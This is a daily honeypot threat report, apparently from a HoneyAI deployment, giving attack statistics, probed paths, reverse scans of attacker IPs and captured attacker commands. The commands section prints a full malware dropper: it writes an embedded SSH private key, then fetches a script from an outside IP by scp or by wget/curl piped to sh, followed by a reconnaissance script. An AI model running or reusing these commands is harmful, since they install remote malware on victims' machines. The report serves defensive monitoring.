๐Ÿ’€ critical

Daily Threat Report

471 SSH Connections
378 Login Attempts
93 Commands Run
37 SSH Unique IPs
2,635 Protocol Events
90 Protocol IPs
92 Web Hits
9 Web Service IPs
12 Reverse Scans
12 Scan Hits

Top Passwords Tried

  1. 4813494d137e1631
  2. 30eaa80e00533f32
  3. 8c6976e5b5410415

๐ŸŒ WEB HONEYPOT โ€” HoneyAI HTTP

AI-generated fake HTTP responses served to 92 scanner requests from 9 unique IPs (local, offline).

Top Paths Probed

  1. /SDK/webLanguage
  2. /cgi-bin/authLogin.cgi
  3. /v2/_catalog
  4. /solr/admin/cores?action=STATUS&wt=json
  5. /.git/config

Top User-Agents

  1. Mozilla/5.0
  2. Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:146.0) Gecko/20100101 Firefox/146.0
  3. Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
  4. Go-http-client/1.1
  5. Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36

๐Ÿ’ฅ OPERATION SPINE โ€” Reverse Port Scanning

Active defense back-profiling: HoneyAI executed **12** reverse port-scans against active attacker IPs. Out of these, **12** hosts were found with open services.

Discovered Open Ports on Attackers

๐ŸŒ64.62.197.175 Scanned at 00:24
๐ŸŒ64.62.197.172 Scanned at 01:56
๐ŸŒ64.62.197.171 Scanned at 01:57
๐ŸŒ64.89.163.163 Scanned at 05:25
๐ŸŒ165.232.137.121 Scanned at 07:05
๐ŸŒ24.144.82.180 Scanned at 07:39
๐ŸŒ193.163.125.48 Scanned at 07:41
๐ŸŒ87.236.176.13 Scanned at 07:42
๐ŸŒ64.89.163.168 Scanned at 13:16
๐ŸŒ64.89.163.178 Scanned at 14:43
๐ŸŒ172.104.52.201 Scanned at 20:11
๐ŸŒ145.90.8.9 Scanned at 20:12
# Automatic multi-platform threat intel reporting
$ honeypot-report.sh --since 24h
โ†’ 122 IPs โ†’ AbuseIPDB  (community confidence scores updated)
โ†’ 122 IPs โ†’ AlienVault OTX  (pulse indicators added)
โ†’ 122 IPs โ†’ Blocklist.de  (auto-ban list updated)
โ†’ 122 IPs โ†’ DShield/SANS  (global threat feed updated)

๐Ÿคฃ ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

๐Ÿ”‘ Hall of Shame โ€” Passwords

4813494d137e1631
30eaa80e00533f32
8c6976e5b5410415

๐Ÿ’ป Commands They Tried

uname -s -m
/bin/./uname -s -v -n -r -m
uname -a
uname -a; echo -e $_dq\x61\x75\x74\x68\x5F\x6F\x6B\x0A$_dq; cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACDveEt+JtIVZGBVIbVkHvdkvQqdMiafu5/IMOvelH/yxgAAAJAt8FDRLfBQ
0QAAAAtzc2gtZWQyNTUxOQAAACDveEt+JtIVZGBVIbVkHvdkvQqdMiafu5/IMOvelH/yxg
AAAEAr1wl+3JHkjA3ZtPtjd8bAtLVFo13eZ12Aw2QnFXC/ie94S34m0hVkYFUhtWQe92S9
Cp0yJp+7n8gw696Uf/LGAAAACGRsckBzZnRwAQIDBAU=
-----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -F sshcfg -i key.ppk dlr@217.60.195.113:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh ssh >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s ssh; fi; rm -rf sshcfg key.ppk out_sh
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH
uname=$(uname -s -v -n -m 2>/dev/null)
arch=$(uname -m 2>/dev/null)
uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1)
cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c $_dq^processor$_dq /proc/cpuinfo 2>/dev/null) | head -1)
cpu_model=$( (grep -m1 -E $_dqmodel name|Hardware$_dq /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,$_dq$_dq,$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' )
gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50)
cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1)
ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1)
last_output=$(last 2>/dev/null | head -n 10)
echo $_dqUNAME:$uname$_dq
echo $_dqARCH:$arch$_dq
echo $_dqUPTIME:$uptime$_dq
echo $_dqCPUS:$cpus$_dq
echo $_dqCPU_MODEL:$cpu_model$_dq
echo $_dqGPU:$gpu_info$_dq
echo $_dqCAT_HELP:$cat_help$_dq
echo $_dqLS_HELP:$ls_help$_dq
echo $_dqLAST:$last_output$_dq

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 22 de junio de 2026. Recorded 471 SSH connections and 2635 multi-protocol decoy events on HoneyAI, from 127 unique IPs. 122 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (HoneyAI)

The SSH service received 378 login attempts from 37 unique IPs. Attackers executed 93 commands after gaining simulated system access.

Multi-Protocol Decoys (HoneyAI)

Detected 2635 events across services including FTP, Telnet, SMTP, MySQL, Redis, Git, VNC, and RDP from 90 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Service (HoneyAI)

The web service received 92 HTTP requests from real scanners across 9 unique IPs. Each attacker received a fake response generated in real time by the local AI engine (Ollama, no internet connection required).

MCP Agent Trap

The MCP decoy server received 2 requests from 2 unique IPs. Attackers attempted to call internal tools including credential extraction and system command execution.

MSSQL / SNMP Honeypots

The MSSQL decoy received 19 authentication events from 2 IPs. The SNMP trap received 41 queries from 19 IPs probing community strings and OIDs.

Portscan Detection

Detected 0 incoming port scan events from 0 unique IPs.

AI Defense Stats

Blocked 0 prompt injection attempts and 0 identity leak attempts.

Active Defense (Operation Spine)

HoneyAI performed 12 reverse port scans back to active attacker IPs. Out of these, 12 hosts were found running open public services, allowing backfire profiling.

Network IDS (Suricata)

The network intrusion detection system generated 17494 alerts from 560 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

โ† All Reports ๐Ÿ›ก๏ธ Subscribe to blocklists โ†’